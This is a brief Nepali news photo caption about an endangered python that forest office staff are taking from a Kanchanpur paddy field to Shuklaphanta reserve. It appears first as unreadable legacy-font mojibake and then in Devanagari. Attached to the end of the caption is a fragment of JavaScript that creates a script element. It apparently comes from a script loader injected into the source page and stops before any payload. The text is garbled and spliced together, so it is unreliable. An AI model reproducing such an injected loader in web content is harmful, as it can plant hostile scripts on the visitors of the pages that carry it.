nf]kf]Gd'v k|hftL clhªu/ s~rgk'/sf] a]bsf]6 gu/kflnsf–^ d';]kfgLdf ;f]daf/ wfgv]tdf km]nf k/]sf] nf]kf]Gd'v k|hftLsf] clhªu/ jg sfof{nosf sd{rf/L z'SnfkmfF6f cf/Ifdf a'emfpg n}hfb} . tl:a/M /fh]Gb|k|;fb kg]?, s~rgk'/, /f;;

कञ्चनपुरको बेदकोट नगरपालिका–६ मुसेपानीमा सोमबार धानखेतमा फेला परेको लोपोन्मुख प्रजातीको अजिङ्गर वन कार्यालयका कर्मचारी शुक्लाफाँटा आरक्षमा बुझाउन लैजादै । तस्बिरः राससvar d=document;var s=d.createElement(‘script’);